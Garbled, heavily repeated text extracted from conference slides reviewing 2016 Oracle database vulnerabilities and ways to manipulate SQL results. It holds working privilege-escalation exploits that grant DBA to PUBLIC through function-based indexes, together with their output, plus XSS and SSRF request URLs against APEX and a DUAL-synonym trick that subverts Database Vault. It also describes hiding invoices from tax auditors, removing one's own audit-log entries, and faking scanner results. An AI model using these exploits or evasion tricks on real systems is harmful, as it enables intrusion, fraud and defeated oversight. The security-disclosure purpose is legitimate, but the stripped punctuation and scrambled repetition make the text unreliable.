replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
